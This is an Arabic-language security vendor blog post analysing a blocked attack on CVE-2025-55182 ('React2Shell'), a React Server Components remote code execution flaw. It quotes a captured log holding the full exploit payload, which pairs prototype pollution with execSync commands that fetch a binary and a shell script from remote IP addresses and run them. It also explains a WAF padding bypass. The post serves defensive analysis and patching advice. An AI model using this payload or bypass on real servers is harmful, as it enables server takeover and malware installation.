HiveProtect.ai » العربية » blog » CVE-2025-55182، « React2Shell » وما زلنا حماية استباقية HiveProtect.ai

تحليل التهديدات: CVE-2025-55182، « React2Shell » والحماية الاستباقية HiveProtect.ai

CVE-2025-55182، "React2Shell" وما زلنا حماية استباقية HiveProtect.ai

تاريخ التقرير: 6 ديسمبر 2025

شدة التهديد: حرج (CVSS 10.0)

المتجه: تنفيذ الشيفرة عن بعد (RCE) عبر مكونات خادم React

حالة HiveProtect.ai: مسدود

1. الملخص التنفيذي

في أوائل ديسمبر 2025، تم الكشف عن ثغرة حرجة في نظام React، تؤثر بشكل خاص على مكونات خوادم React (RSCs) والأطر مثل Next.js. يشار إلى هذا العيب باسم CVE-2025-55182 (وغالبا ما يشار إليه باسم « React2Shell« ), ويسمح للمهاجم غير المصادق عليه بتنفيذ شيفرة عشوائية على الخادم عن طريق التلاعب بتدفق تسلسل بروتوكول Flight .

وفي الوقت نفسه، ظهرت تقنية تهرب تعرف باسم هجوم الحشو لتجاوز جدران الحماية التقليدية لتطبيقات الويب (WAFs)، بما في ذلك تكوينات كلاودفلير الافتراضية. من خلال تحميل الجسم المطلوب فوق الحد القياسي للفحص (غالبا 128 كيلوبايت)، يحاول المهاجمون إخفاء حمولتهم الخبيثة.

يحلل هذا التقرير محاولة هجوم فعلية اعترضتها HiveProtect.ai في 5 ديسمبر 2025. على الرغم من أن هذا الهجوم استهدف تحديدا البنى التحتية Node.js/Next.js، إلا أنه تم اكتشافه وتحييده بواسطة قواعد HiveProtec الاستدلالية على بنية ووردبريس التحتية، مما يثبت فعالية النهج السلوكي والمستقل عن الأمن.

2. مشهد التهديد: CVE-2025-55182

2.1 آليات الصدع

تكمن الثغرة في الطريقة التي يتعامل بها React 19 و Next.js (موجه التطبيقات) مع إزالة تسلسل البيانات التي يرسلها العميل إلى الخادم عبر بروتوكول « Flight » الداخلي. يسمح هذا البروتوكول للعميل بإرسال هياكل معقدة، بما في ذلك الإشارات إلى مكونات الخادم.

يستغل الهجوم التحقق الكافي أثناء هذا الإلغاء التسلسلي. يمكن للمهاجم تزوير طلب JSON يحتوي على توجيهات خاصة (مثل $1:__proto__:then) لتلوث النموذج الأولي لكائنات JavaScript أو لإجبار الخادم على استيراد وحدات داخلية خطيرة، مثل child_process Node.js. بمجرد استيراد الوحدة، يمكن للمهاجم استدعاء وظائف مثل execSync لتشغيل أوامر النظام مباشرة على خادم المضيف.

2.2 تحدي الحشو (تجنب WAF)

تتفاقم خطورة هذه الحملة بتقنية التحايل على WAF. معظم جدران الحماية في التطبيقات، لأسباب تتعلق بالأداء، تحلل فقط بداية طلب HTTP (أول 128 كيلوبايت في Cloudflare Enterprise بشكل افتراضي، وأحيانا أقل في خطط أخرى).

قام المهاجمون بتصنيع طريقة يملأون فيها بداية الطلب ببيانات غير ضارة (فراغات، تعليقات، حقول فارغة) ل « دفع » الحمولة الخبيثة ( حمولة RCE JSON) إلى ما وراء هذا الحد. إذا لم يقم WAF بحجب كميات كبيرة من البيانات بشكل صارم، فإن الحمولة تبقى غير مكتشفة وتصل إلى الخادم الضعيف، الذي سيقرأ الطلب بالكامل.

3. تشريح الهجوم تم صده بواسطة HiveProtect.ai

في 5 ديسمبر 2025، اعترضت أنظمة HiveProtect.ai محاولة استغلال معقدة ومنعت منها. إليكم التحليل الجنائي للسجل الذي تم الاستيلاء عليه.

3.1 سجل خام

05/12/2025 21:38	95.214.52.170
🔒 Bloquée	Warsaw, Poland 🇵🇱
🌐 API externe
DNS: DNS reverse vide	Critique	100	NoSQL Injection - Query (dans paramètres)	
📍 URL: /
🔍 Pattern détecté: /{.*?$.*?:.*?}/
🌐 User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) ...

Paramètres POST:
["{"then": "$1:__proto__:then","status": "resolved_model","reason": -1,"value": "{"then":"$B1337"}","_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('(cd /dev;busybox wget http://31.56.27.76/n2/x86;chmod 777 x86;./x86 reactOnMynuts;busybox wget -q http://193.34.213.150/nuts/bolts -O-|sh)',{'timeout':120000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});","_chunks": "$Q2","_formData": {"get": "$1:constructor:constructor"}}}",""$@0"","[]"]

3.2 فك ترميز الحمولة

كتلة كود JSON هذه ليست مجرد حقن بيانات بسيط؛ إنه سكريبت تنفيذ كامل مصمم للسيطرة الكاملة على الخادم. دعونا نحللها سطرا بسطر:

قد. تلوث نموذجي (__proto__)

"then": "$1:__proto__:then"

يبدأ المهاجم بالتلاعب بالنموذج الأولي للجسم الذي يتم معالجته. هذا هو حجر الأساس لاستغلال CVE-2025-55182. من خلال حقن خاصية ثم عبر النموذج الأولي، يجبر المهاجم إطار عمل React على التعامل مع حمولته كوعد غير متزامن (« Thenable »)، مما يؤدي إلى تنفيذ الكود المحقون عند حل ذلك الوعد.

B. استدعاء Node.js (child_process)

process.mainModule.require('child_process').execSync(...)

هذا هو جوهر الهجوم. يتجاوز المهاجم الحماية المعتادة عن طريق استدعاء وحدة Node.js الرئيسية مباشرة لطلب child_process. تسمح وظيفة execSync بتنفيذ أوامر shell المتزامنة (الحجب)، مما يضمن أن الخادم سينتظر حتى يكتمل التنفيذ الخبيث قبل الرد.

ج. سلسلة القتل

الأمر المقدم على النظام عدواني بشكل خاص:

  • cd /dev : انتقل إلى مجلد يمكن كتابته عادة على أنظمة لينكس (ذاكرة مشتركة)، وغالبا ما يستخدم لتجنب ترك آثار على القرص الصلب.
  • busybox wget http://31.56.27.76/n2/x86 : تحميل ملف ثنائي خبيث (يسمى x86) من عنوان IP بعيد (ربما خادم آخر مخترق يعمل كخادم أوامر وتحكم – C2). استخدام busybox يشير إلى أن الهجوم موجه إلى بيئات الحاويات (Docker/Kubernetes) حيث تكون الأدوات القياسية مثل curl أو full wget غائبة أحيانا.
  • chmod 777 x86; ./x86 reactOnMynuts : يتم جعل الملف تنفيذيا ويتم تشغيله فورا. حجة reactOnMynuts ربما تكون مفتاحا أو علامة لبدء البرمجيات الخبيثة . غالبا ما يكون هذا الثنائي عبارة عن « قطرة« ، أو بوت نت (نوع ميراي أو نسخه)، أو منجم عملات رقمية.
  • busybox wget … -O-|sh : مرحلة تحميل ثانية تنفذ سكريبت shell (bolts) مباشرة في الذاكرة (يتم إرسالها إلى sh)، مما يضمن استمرار أو تحميل أدوات إضافية.

د. الخروج عن طريق الخطأ (NEXT_REDIRECT)

throw Object.assign(new Error('NEXT_REDIRECT'), {digest:${res}});

لرؤية نتيجة هجومهم (نتيجة الأمر)، يستخدم المهاجم خدعة ذكية خاصة Next.js. يولد خطأ من النوع NEXT_REDIRECT. عادة ما يستخدم هذا الخطأ في الإطار للتعامل مع إعادة توجيه HTTP، وهنا يتم تحويل هذا الخطأ لإرجاع نتيجة الأمر (${res}) في حقل الملخص لاستجابة HTTP. هذا يحول الهجوم « الأعمى » (RCE الأعمى) إلى هجوم مع تغذية راجعة فورية.

3.3 لماذا HiveProtect.ai منعه (تحليل القواعد)

يشير السجل إلى اكتشاف بواسطة القاعدة: NoSQL Injection – الاستعلام (في المعلمات).

من الضروري هنا ملاحظة نقطة تقنية مهمة. على الرغم من أن الهجوم هو React RCE وليس حقن NoSQL (MongoDB/CouchDB)، إلا أن الكتلة مثال مثالي على نجاح الكشف الاستدلالي.

  • النمط الذي تم اكتشافه: /{.*?$.*?:.*?}/ يبحث هذا النمط عن هياكل JSON التي تحتوي على مفاتيح أو قيم برمز $. في عالم قواعد بيانات NoSQL، يستخدم ال $ للمشغلين (مثل $where، $ne).
  • مباراة React: يستخدم بروتوكول React Flight أيضا رمز $ بشكل كبير للإشارة إلى الكائنات والوعود (مثل $1، $B 1337، $@0).
  • النتيجة: قاعدة الأمان HiveProtect.ai، المصممة لاعتراض هياكل البيانات المشبوهة وغير القياسية، حددت الحمولة بشكل صحيح كحالة حرجة. على الرغم من أن التوقيع المحدد « CVE-2025-55182 » لم يذكر صراحة، إلا أن الطبيعة الشاذة للطلب هي التي أدت إلى تفعيل الحماية.

بالإضافة إلى ذلك، تم تعظيم درجة التهديد (100/حرج) بواسطة عامل سياقي: DNS: عكس DNS فارغ. عنوان IP المهاجم 95.214.52.170 لم يكن لديه دقة DNS عكسية صالحة، وهي ميزة نموذجية للروبوتات الآلية وآلات الزومبي المستخدمة في شبكات البوت. HiveProtect.ai يجمع بين التحليل السلوكي ( الحمولة) والسمعة (الملكية الفكرية) لاتخاذ قرار نهائي للحجب (END).

4. أهمية الحماية المقطعية

قد يطرح سؤال مشروع: « موقعي يعمل على ووردبريس (PHP)، لماذا HiveProtect.ai تمنع هجوما على Node.js؟ »

هنا تكمن قوة الحل.

  • الحماية من « الرش والصلاة »: شبكات البوت نت الحديثة لا تستهدف جراحيا. يقومون بمسح الإنترنت بالكامل عبر IPv4. يرسلون ثغرات React إلى خوادم PHP، وثغرات جافا إلى خوادم بايثون، وأكثر.
  • توفير الموارد: حتى لو لم يكن من الممكن تنفيذ هذا الحمولة RCE على محرك PHP، فإن معالجة مثل هذا الطلب تستهلك عرض النطاق الترددي، ودورات وحدة المعالجة المركزية (لتحليل JSON أو السجلات) وتلوث بياناتك التحليلية. من خلال حجب الطلب على الحافة، HiveProtect.ai يحمي أداء البنية التحتية لديك.
  • الدفاع في العمق: البنية التحتية الحديثة غالبا ما تكون هجينة. يمكن لموقع ووردبريس أن يتعايش على نفس الخادم مع واجهة برمجة تطبيقات Node.js، أو يستخدم وكيل عكسي غير مكون بشكل خاطئ. حجب التهديدات عبر جميع التقنيات هو النهج الأمني الوحيد القابل للتطبيق.

5. توصيات السياسات

بعد هذه الموجة من الهجمات وتحليل هذا الحادث، نوصي باتخاذ الإجراءات التالية لجميع المسؤولين تحت حماية HiveProtect.ai :

5.1 لبيئات ووردبريس (القياسية)

  • حافظ على قاعدة « الجسم الكبير » نشطة: كما يظهر في محاولات الحشوة، فإن حجب أجسام الطلبات الكبيرة غير الضرورية (>128 كيلوبايت) على نقاط النهاية القياسية (/، /wp-json/) يعد دفاعا فعالا للغاية ضد محاولات تجاوز WAF.
  • مراقبة السجلات المحجوبة: حجب النشاط على قواعد « NoSQL » أو « حقن الكود » على موقع ووردبريس الخاص بك هو مؤشر جيد على أن عنوان IP الخاص بك ضمن قائمة أهداف البوت نت النشطة.

5.2 للبيئات الهجينة (ووردبريس + Next.js/عقدة)

  • تحديث عاجل وعاجل: إذا كنت تستضيف Next.js، قم بالتحديث إلى الإصدار 14.2.20+، 15.0.4+، أو 15.1.0+ بشكل ضروري. بالنسبة ل React، استهدف 19.0.1+. هذا هو التصحيح الوحيد الحاسم في الجذر.
  • معالجة WAF: تأكد من أن قواعد WAF الخاصة بك لا تتوقف عند فحص الرؤوس. الجمع بين قواعد HiveProtect الاستدلالية وقواعد Cloudflare المدارة (خاصة في إلغاء التسلسل) أمر أساسي.

استنتاج

الهجوم الذي تم اعتراضه في 5 ديسمبر من بولندا يوضح مدى سرعة استغلال الجهات الخبيثة للثغرات الجديدة (CVE-2025-55182). يمثل الحمولة المعقدة، التي تجمع بين تلوث النموذج الأولي، وإمكانية تجاوز WAF ، وتنفيذ أوامر النظام، الطرف الأعلى من طيف تهديدات الويب الحالية.

أظهرت HiveProtect.ai مرونتها من خلال صد هجوم « يوم الصفر » (أو « يوم النقابة ») باستخدام كشف سلوكي قوي، مما يحمي بنية العميل التحتية بغض النظر عن التكنولوجيا الأساسية.